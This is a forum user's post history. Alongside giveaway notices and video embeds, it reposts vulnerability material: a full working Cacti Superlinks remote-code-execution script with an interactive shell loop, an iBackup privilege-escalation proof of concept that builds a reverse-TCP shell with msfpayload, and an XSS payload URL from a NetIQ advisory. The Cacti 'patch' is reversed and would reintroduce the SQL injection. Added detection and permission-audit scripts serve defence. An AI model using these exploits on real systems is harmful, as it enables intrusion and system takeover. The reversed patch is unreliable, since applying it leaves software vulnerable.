Everything posted by Aerosol
-
Free 1-Year License Bitdefender Total Security 2015 (100% discount)
Aerosol replied to Aerosol's topic in Free stuff
It's not the same thing, man, don't you see? -
To translate from Romanian into English? If that's it, I can help you too.
-
@Cronicles <center> Part 1 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=XUHbVFNIQNNQINFVbHUX&width=700&height=360" allowFullScreen></iframe> Part 2 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=YeAgBXZdDIIDdZXBgAeY&width=700&height=360" allowFullScreen></iframe> Part 3 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=KOUQYcXIHTTHIXcYQUOK&width=700&height=360" allowFullScreen></iframe> </center> view-source:http://www.topvideohd.com/2013/05/avatar-2009-online-subtitrat-in-romana.html
-
DxO Optics Pro 8 Elite is a photo and image processing program that enhances and improves your photos and images using advanced algorithms and techniques — automatically. Want more features? Get DxO Optics Pro 10 Elite with free updates, the latest and greatest version of DxO Optics Pro! Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 41 days 22 hrs 21 mins Free DxO Optics Pro 8 Elite (100% discount)
-
Ashampoo Internet Accelerator 3 is a program that aims to do things: boost your connection speed by optimizing internet-related settings and clean your internet-related privacy traces. Want more features? Upgrade to Ashampoo WinOptimizer 11, which has all the internet optimization and privacy cleaning features of Ashampoo Internet Accelerator 3 plus more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 2 days 22 hrs 24 mins Free Ashampoo Internet Accelerator 3 (100% discount)
-
Bitdefender Total Security 2015 is an all-in-one security package for your computer. It provides protection against malware (viruses, trojans, spyware, adware, etc.), has a built-in firewall, helps guard online transactions, protects your privacy, and more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 1 day 22 hrs 24 mins Free 1-Year License Bitdefender Total Security 2015 (100% discount)
-
@Cronicles send me a link to that site.
-
Researchers at Google have uncovered several serious vulnerabilities in the Network Time Protocol and experts warn that there are exploits publicly available for some of the bugs. The vulnerabilities are present in all versions of NTP prior to 4.2.8 and include several buffer overflows that are remotely exploitable.

The NTP is a protocol that’s used to synchronize the time on servers across networks. It’s ubiquitous and that fact has made it a useful tool for attackers in DDoS attacks in recent years. Attackers have taken advantage of a weakness in NTP to amplify DDoS attacks.

“The reason has to do with the amplification factor,” said Arbor Networks solutions architect Gary Sockrider in April. “With NTP reflection attacks, you get 1000 times the amplification; 1000 times the size of the query is reflected back. There’s more cause for alarm with NTP attacks because attackers get a better response rate.”

The flaws disclosed today in NTP are more worrisome. They put servers running older versions of the protocol at risk of remote code execution.

“Google Security Team researchers Neel Mehta and Stephen Roettger have coordinated multiple vulnerabilities with CERT/CC concerning the Network Time Protocol (NTP). As NTP is widely used within operational Industrial Control Systems deployments, NCCIC/ICS-CERT is providing this information for US Critical Infrastructure asset owners and operators for awareness and to identify mitigations for affected devices,” an advisory from ICS-CERT says. “These vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available.”

The advisory from NTP.org says that a single packet is enough to exploit any of the buffer overflow vulnerabilities. “A remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process,” the advisory says.

Source
-
@Cronicles let's say this is your video: http://videomega.tv/?ref=AJWOLaJQKbbKQJaLOWJA# scroll down to the bottom of the page where it says
-
#!/bin/sh
##############
# Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection
# Date: 19/12/2014
# Exploit Author: Wireghoul
# Software Link: http://docs.cacti.net/plugin:superlinks
# Identifiers: CVE-2014-4644, EDB-ID-33809
# Exploit explanation through inline comments
# Patch provided at the end
#
# This is the year where hope fails you -- Slipknot: Pulse of the maggots
#
##############
echo -e "\e[32m *-*, \e[31m ___________"
echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\"
echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\"
echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'"
echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'"
echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m"
echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___"
echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC"
echo
if [ -z "$1" ]; then
    echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n"
    exit 2
fi
# This exploit is a second order LFI through SQLI, so first we must write some data to disk
# Luckily the application logs all sort of stuff, so lets poison the application log
# The reason for this is manyfold, read on.
curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null
# Now lets analyse the vulnerability:
# superlinks.php:21:if (isset($_GET['id'])) {
# superlinks.php:22: $pageid=$_GET['id'];
# superlinks.php:23:}
# superlinks.php:24:
# superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT
# superlinks.php:26: id,
# superlinks.php:27: title,
# superlinks.php:28: style,
# superlinks.php:29: contentfile
# superlinks.php:30: FROM (superlinks_pages, superlinks_auth)
# superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid
# superlinks.php:32: AND id=" . $pageid . "
# This is where the injection occurs, we can now union select 1,2,3,4 -- ftw
# However the real fun occurs a few lines later
# superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile'];
# superlinks.php:58:
# superlinks.php:59: if (file_exists($my_file)) {
# superlinks.php:60: @InClude_once($my_file);
# We can now include a file of our choosing (LFI) based on the data returned from the SQLi
# There are only a few problems:
# * We cannot use strings/quotes as magic quotes are usually on
# * We do not know the local path for the LFI
# * Usual tricks like /proc/self* have been patched
# * Database server and web server may be different hosts
# Lets solve the easy one first, we dont need to quote our strings, hex encoding works great
# The second one is a little trickier, we can brute force LFI locations... or
# We can dynamically locate a file path which is stored in the database and present on the webserver
# $ mysqldump cacti | grep '\.log'
# INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password','');
# $ ls -la /var/log/cacti/cacti.log
# -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log
# $ tail /var/log/cacti/cati.log
# <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name"
# WINRAR!
# We can now include the poisoned log file by fetching the log path from the database
# and prepending it with the normal directory traversal pattern ../../../ using concat()
# We traverse 8 deep, that's usually enough
echo -ne "Dropping into shell, type exit to quit.\ncactishell> "
while read line; do
    if [ "$line" == "exit" ]; then
        exit
    fi
    comand=`echo -n $line | sed -e's/ /+/g'`
    curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \
        sed -n '/SHELL/, $p' | \
        sed -e 's/.*SHELL//' |\
        sed '/LLEHS/, $d'
    echo -n "cactishell> "
done
# Proposed patch
# Vendor has a patch in a SVN repo somewhere:
# http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475
# Yet has not made the patch available, or responded to requests to do so:
# http://forums.cacti.net/viewtopic.php?t=53711
#--- superlinks.php 2014-12-18 02:05:37.706013833 -0500
#+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500
#@@ -19,7 +19,7 @@
#
# $pageid = 0;
# if (isset($_GET['id'])) {
#- $pageid=intval($_GET['id']);
#+ $pageid=$_GET['id'];
# }
#
# $page = db_fetch_row("SELECT DISTINCT
Source
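Review bot: the hunk is reversed: the `-` line carries the fix (`$pageid=intval($_GET['id']);`) while the `+` line restores the raw `$pageid=$_GET['id'];`, so applying it as written would reintroduce the injection into the `db_fetch_row` query that follows. The `---`/`+++` timestamps (02:05:37 for the "old" file, 02:05:09 for the "new" one) also show the two arguments were swapped when the diff was taken; swap the `-`/`+` lines, or apply with `patch -R`, so that the `intval()` cast is what lands in superlinks.php.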
-
SEC Consult Vulnerability Lab Security Advisory < 20141219-0 >
=======================================================================
              title: XSS & Memory Disclosure
            product: NetIQ eDirectory NDS iMonitor
 vulnerable version: 8.8 SP8, 8.8 SP7
      fixed version: 8.8 SP8 HF 4, fix available for versions 8.8 SP7
                     (8.8.7.4 HF 4, 8.8.7.6 HF 3)
         CVE number: CVE-2014-5212, CVE-2014-5213
             impact: High
           homepage: https://www.netiq.com/
              found: 2014-10-29
                 by: W. Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"eDirectory(TM) is a full-service, secure LDAP directory providing incredible
scalability and an agile platform to run your organization's identity
infrastructure and multi-platform network services."

URL: https://www.netiq.com/products/edirectory/

Business recommendation:
------------------------
An attacker without an account on the NetIQ eDirectory NDS iMonitor is able
to gain administrative access by luring an authenticated administrator to
visit an attacker-controlled web site. Moreover, an authenticated attacker is
able to retrieve internal data which potentially contains sensitive data.

As the NetIQ eDirectory is often used to maintain a centralized user database
it is a very attractive target for an attacker. By compromising this system,
an attacker may be able to conduct further attacks on other systems.

SEC Consult recommends to immediately conduct a full security review of this
software, especially if used as a centralized user database.

Vulnerability overview/description:
-----------------------------------
1) Memory Disclosure (CVE-2014-5213)
Using crafted HTTP requests an administrative user can retrieve parts of the
virtual memory from the service. This potentially discloses secret data like
passwords.

2) Reflected Cross Site Scripting (XSS, CVE-2014-5212)
A reflected cross site scripting vulnerability was identified. An attacker
could take over the user account of a valid administrator.

Proof of concept:
-----------------
1) Memory Disclosure (CVE-2014-5213)
When accessing the following URL as an authenticated user, parts of the
virtual memory can be retrieved:
https://<host>:8030/nds/files/opt/novell/eDirectory/lib64/ndsimon/public/images

2) Reflected Cross Site Scripting (XSS, CVE-2014-5212)
The following URL demonstrates a reflected XSS flaw:
https://<host>:8030/nds/search/data?scope=st&rdn=%3C/script%20%3E%3Cscript%20%3Ealert%28%22XSS%22%29%3C/script%20%3E

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ eDirectory NDS
iMonitor version 8.8 SP8, which was the most recent version at the time of
discovery.

Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-11-18: Novell: the vulnerabilities have been fixed by development; the patches will be released end of November
2014-12-08: Novell: the release has been pushed to Dec. 8th
2014-12-09: Novell: the release 8.8.8.4 should be released tomorrow; the hotfix for 8.8.7.6 is still pending
2014-12-17: Verifying release of advisory; asking whether patches have been released
2014-12-18: Novell: Patches have been released
2014-12-19: Coordinated release of security advisory

Solution:
---------
Update to the release 8.8.8.4 or apply fix for versions 8.8 SP 7.

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult? Write to career@sec-consult.com
EOF W. Ettlinger / @2014
Source
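A detection example, added here and not part of the SEC Consult advisory: it scans constructed web-server access-log lines for the two request shapes the proof of concept above uses, requests under /nds/files/ (the memory-disclosure path) and /nds/search/data requests whose rdn parameter carries script markup (the reflected XSS). The combined-log format, the sample lines and the function names are assumptions of this example.

```python
"""Flag iMonitor requests shaped like the advisory's two PoC URLs.

Added example (not the advisory's code). Assumes Apache/NCSA combined-style
access logs for the iMonitor service on port 8030; sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# "<ip> - <user> [<ts>] "<method> <url> HTTP/x.y" <status> ..." (combined log format)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup that has no business inside an LDAP RDN value.
SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)


def classify(url: str):
    """Return a finding label for a request URL, or None if it looks benign.

    The memory-disclosure PoC fetches a server-side path under /nds/files/;
    the XSS PoC reflects the rdn parameter of /nds/search/data unescaped.
    """
    parts = urlsplit(url)
    path = unquote(parts.path)                     # decode %xx in the path
    if path.startswith("/nds/files/"):
        return "memory-disclosure-path"
    if path == "/nds/search/data":
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("rdn", []):
            # parse_qs already decoded once; unquote again catches double encoding
            if SCRIPT_RE.search(unquote(value)):
                return "reflected-xss"
    return None


def scan(log_text: str):
    """Return (client_ip, label, url) for every log line that matches a PoC shape."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                               # not a request line we understand
        label = classify(m.group("url"))
        if label:
            hits.append((m.group("ip"), label, m.group("url")))
    return hits


# Constructed sample log: line 1 mirrors the XSS PoC, line 2 the memory
# disclosure PoC, lines 3 and 4 are ordinary iMonitor traffic.
SAMPLE_LOG = """\
10.0.0.5 - admin [19/Dec/2014:10:01:02 +0100] "GET /nds/search/data?scope=st&rdn=%3C/script%20%3E%3Cscript%20%3Ealert%28%22XSS%22%29%3C/script%20%3E HTTP/1.1" 200 1843
10.0.0.5 - admin [19/Dec/2014:10:01:09 +0100] "GET /nds/files/opt/novell/eDirectory/lib64/ndsimon/public/images HTTP/1.1" 200 65536
10.0.0.7 - admin [19/Dec/2014:10:02:00 +0100] "GET /nds/search/data?scope=st&rdn=cn%3Djdoe HTTP/1.1" 200 912
10.0.0.7 - admin [19/Dec/2014:10:02:30 +0100] "GET /nds/summary HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for ip, label, url in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{url}")
```

Requests under /nds/files/ may also come from legitimate UI assets, so treat that label as a review queue rather than an alert on its own.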
-
Document Title:
===============
iBackup v10.0.0.45 - Privilege Escalation Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1382

Release Date:
=============
2014-12-18

Vulnerability Laboratory ID (VL-ID):
====================================
1382

Common Vulnerability Scoring System:
====================================
6.2

Product & Service Introduction:
===============================
With IBackup, you can backup/restore interactively or schedule regular online backups for Windows desktops, laptops and servers. It has a simple, user-friendly interface coupled with powerful scheduling and logging features. IBackup automatically selects critical data (Desktop, Music, Pictures, Videos, Documents, Windows Mail, Favourites) for backup. Advanced features include Open file Backup, System State backup, MS SQL Server, MS Exchange Server, Hyper-V, MS SharePoint Server and Oracle Server backups.

(Copy of the Vendor Homepage: https://www.ibackup.com/ibwin/downloads/IBackupsetup.exe )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local privilege escalation vulnerability in the official Pro Softnet Corporation iBackup v10.0.0.45 software.

Vulnerability Disclosure Timeline:
==================================
2014-12-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Pro Softnet Corporation
Product: iBackup - Server Software 10.0.0.45

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local privilege escalation vulnerability has been discovered in the official iBackup v10.0.0.45 software. The vulnerability allows local attackers to gain higher access privileges by execution of arbitrary codes.

The `ibservice` service for windows could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user`s code would execute with the elevated privileges of the application.

The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. Exploitation of the vulnerability requires a local privileged system user account without user interaction. Successful exploitation of the arbitrary code execution vulnerability results in software- or system compromise.

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers with low privileged or restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs ---
C:\Users\s-dz\Desktop>sc qc ibservice
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ibservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IBackup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\IBackupWindows\"
C:\Program Files\IBackupWindows
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Tout le monde
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_EA
        DELETE
        SYNCHRONIZE
        READ_CONTROL
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW AUTORITE NT\SystÞme
        FILE_ALL_ACCESS
  RW BUILTIN\Administrateurs
        FILE_ALL_ACCESS
  R  BUILTIN\Utilisateurs
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL

############## PROOF

C:\Users\s-dz\Desktop>net user s-dz
Nom d'utilisateur                          s-dz
Nom complet                                s-dz
Commentaire
Commentaires utilisateur
Code du pays                               000 (Valeur par défaut du système)
Compte : actif                             Oui
Le compte expire                           Jamais

Mot de passe : dernier changmt.            18/12/2014 01:12:55
Le mot de passe expire                     Jamais
Le mot de passe modifiable                 18/12/2014 01:12:55
Mot de passe exigé                         Oui
L'utilisateur peut changer de mot de passe Oui

Stations autorisées                        Tout
Script d'ouverture de session
Profil d'utilisateur
Répertoire de base
Dernier accès                              18/12/2014 06:04:49

Heures d'accès autorisé                    Tout

Appartient aux groupes locaux              *Utilisateurs
Appartient aux groupes globaux             *None
La commande s'est terminée correctement.

C:\Users\s-dz\Desktop>

root@samir:~# msfpayload windows/shell_reverse_tcp lhost='192.168.1.5' lport='4433' X > C:\Users\s-dz\Desktop\evil-ZDserv.exe

C:\Users\s-dz\Desktop>copy evil-ZDserv.exe "C:\Program Files\IBackupWindows\ib_service.exe"
Remplacer C:\Program Files\IBackupWindows\ib_service.exe (Oui/Non/Tous) : o
        1 fichier(s) copié(s).

We will open cmd as administrator to start the ibservice service:

C:\Users\s-dz\Desktop>sc start ibservice

now nc ... (user)

C:\Users\s-dz\Desktop>nc.exe -lvp 4433
listening on [any] 4433 ...
connect to [192.168.1.5] from s-dz [192.168.1.5] 16040
Microsoft Windows [version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Tous droits réservés.

C:\Windows\system32>whoami
whoami
autorite nt\système

C:\Windows\system32>

Security Risk:
==============
The security risk of the local privilege escalation software vulnerability in the root path is estimated as high. (CVSS 6.2)

Credits & Authors:
==================
Hadji Samir S-dz@hotmail.fr

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Source
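The root cause in the advisory above is a service binary living in a directory that "Tout le monde" (Everyone) can add files to and delete from. As an added audit example (not the advisory's code), the Python below parses the text that accesschk.exe -dqv prints for a service directory and reports any principal every local user belongs to that holds a write-class right there; the sample output is constructed to mirror the PoC, and the principal and right lists are assumptions to extend per locale.

```python
"""Audit accesschk -dqv output for service directories writable by low-privileged users.

Added example, not the advisory's code. Input format: the text printed by
Sysinternals accesschk.exe -dqv <dir> (one path at column 0, then indented
"RW <principal>" / "R <principal>" lines, each followed by one right per line).
"""
import re

# Principals that any local account effectively belongs to. English names plus
# the French ones visible in the advisory's PoC output; extend for other locales.
LOW_PRIV_PRINCIPALS = {
    "everyone", "tout le monde",
    "builtin\\users", "builtin\\utilisateurs",
    "nt authority\\authenticated users", "autorite nt\\utilisateurs authentifiés",
}
# Rights that let a principal plant, replace or remove a file in the directory.
# The PoC relies on FILE_ADD_FILE + DELETE on the directory to overwrite ib_service.exe.
WRITE_RIGHTS = {"FILE_ADD_FILE", "FILE_ADD_SUBDIRECTORY", "FILE_WRITE_DATA",
                "FILE_DELETE_CHILD", "DELETE", "FILE_ALL_ACCESS",
                "WRITE_DAC", "WRITE_OWNER"}

ACE_HEADER = re.compile(r"^\s+(RW|R|W)\s+(.+)$")


def parse_accesschk(output: str) -> dict:
    """Return {directory: [(principal, [right, ...]), ...]} from accesschk -dqv text."""
    result, path, current = {}, None, None
    for raw in output.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if not line.startswith(" "):            # unindented line: a new directory path
            path = line
            result[path] = []
            current = None
            continue
        m = ACE_HEADER.match(line)
        if m:                                   # "RW <principal>": start a new ACE
            current = (m.group(2).strip(), [])
            result[path].append(current)
        elif current is not None and line.strip().isupper():
            current[1].append(line.strip())     # an individual right under that ACE
        # anything else (e.g. "Medium Mandatory Level ...") is informational
    return result


def writable_by_low_priv(parsed: dict) -> list:
    """List (directory, principal, offending_rights) where a catch-all principal can write."""
    findings = []
    for directory, aces in parsed.items():
        for principal, rights in aces:
            bad = WRITE_RIGHTS & set(rights)
            if principal.lower() in LOW_PRIV_PRINCIPALS and bad:
                findings.append((directory, principal, sorted(bad)))
    return findings


# Constructed sample modelled on the PoC output above (French principal names,
# abbreviated right lists); the second directory is a correctly permissioned control.
SAMPLE = """C:\\Program Files\\IBackupWindows
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Tout le monde
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_LIST_DIRECTORY
        DELETE
        SYNCHRONIZE
        READ_CONTROL
  RW AUTORITE NT\\SystÞme
        FILE_ALL_ACCESS
  R  BUILTIN\\Utilisateurs
        FILE_LIST_DIRECTORY
        READ_CONTROL
C:\\Program Files\\SafeApp
  Medium Mandatory Level (Default) [No-Write-Up]
  RW AUTORITE NT\\SystÞme
        FILE_ALL_ACCESS
  R  BUILTIN\\Utilisateurs
        FILE_LIST_DIRECTORY
"""

if __name__ == "__main__":
    for directory, principal, rights in writable_by_low_priv(parse_accesschk(SAMPLE)):
        print(f"{directory}: {principal} holds {', '.join(rights)}")
```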
-
@AndreiMihai you won't manage to do anything with those 1,200 euros; if only everything were that easy...
-
Introduction Hopefully you are familiar with Assembly language and have some little knowledge on how to use reverse engineering tools such as Debuggers, Disassemblers, PE Analyzers, etc. This article will only concentrate on the RSA cryptosystem and how to reverse it to get a valid key for your name. We will be targeting a challenge made especially for this tutorial to demonstrate how to do that. Tools Needed Assuming you’ve already got the required knowledge on how to use reverse engineering tools, these are the essential tools for this article (the download links are in the bottom): The target file (CryptoChallenge1.exe) IDA (Interactive Disassembler): Disassembler for computer software which generates assembly language source code from machine-executable code. OllyDBG: An x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. PEiD: PE analyzes tool, detects most common packers, cryptors and compilers for PE files, it also detects hashes and cryptographic algorithms used in the PE file. RE-SIGS: IDA signature file to detect libraries used by programs. GODUP: OllyDBG plugin to load IDA signature files. RSA-Tool: Useful for generation of key pairs, encryption/decryption and also integer factorization (and that’s what we will use it for). TiBiNuCa: A Tiny Big Number Calculator (requires dotNetFx4). What is RSA? RSA is a public-key cryptosystem. It was developed in 1977 by Ronald Rivest, Adi Shamir and Leonard Adleman. The fact that it’s a public-key cryptosystem means that it uses a public and a private key for the encryption/decryption of data. Its strength lies in the integer factorization problem (the larger the number, the harder and longer it will take to factorize) commonly known as the RSA Problem. RSA uses the following parameters: P: 1st large prime number. Q: 2nd large prime number. E: Public Exponent. N: Public Modulus. D: Private Exponent. Key generation Choose a key length (measured in bits). 
Generate the two random prime numbers P and Q. Choose a public exponent E such that GCD(E, (P-1)*(Q-1))==1), the most commonly used number is 65537. Compute the Public Modulus N = P * Q. Determine the Private Exponent (D) using the Modular multiplicative inverse formula D=E^(-1) mod ((P-1)*(Q-1)). The symbol (^) is used as the Exponent and not the XOR operator. (Mod) means modulo/modulus in computing and is an operation that finds the remainder of the division of one number by another. D must be kept private and must never be published! Alongside P and Q. Encryption To encrypt a message (M) (where M < N), we would use the following formula: C = M ^ E mod N Decryption To decrypt a given cipher © we would use the following formula: M = C ^ D mod N Example (in base 16) By following the steps above: Let’s choose a Keysize: 32 bits (which is totally unsecure). P = 2F6DB Q = 19CD3 E = 10001 (base 16 of 65537). N = P*Q = 4C7B9EA81 D = E^(-1) mod ((P-1)*(Q-1)) = 10001^(-1) mod ( (2F6DB-1) * (19CD3-1) ) = 10001^(-1) mod (2F6DA * 19CD2) = 10001^(-1) mod (4C7B556D4) = 72C6E47D That was calculated using TiBiNuCa: Now that we have our key pairs, we can encrypt our message: M = InfoSec which equals 49 6E 66 6F 53 65 63 in base 16. And since M > N we can split M into blocks smaller than N (M<N) as follows: 496E666F ^ 10001 mod 4C7B9EA81 = 143B30CF8 00536563 ^ 10001 mod 4C7B9EA81 = 380323BEB C = 143B30CF8380323BEB Now in order to decrypt the above cipher we should have the Private Exp (D) but what happens if we don’t! That’s where the factorization comes. That’s the job of RSA-Tool. (We’ll see how to do Factor N later). 143B30CF8 ^ 72C6E47D mod 4C7B9EA81 = 496E666F 380323BEB ^ 72C6E47D mod 4C7B9EA81 = 536563 M = 496E666F536563 = InfoSec. Target analyses Let’s try to apply all of the above in our challenge. I always check the target before everything, so that’s what we will do. 
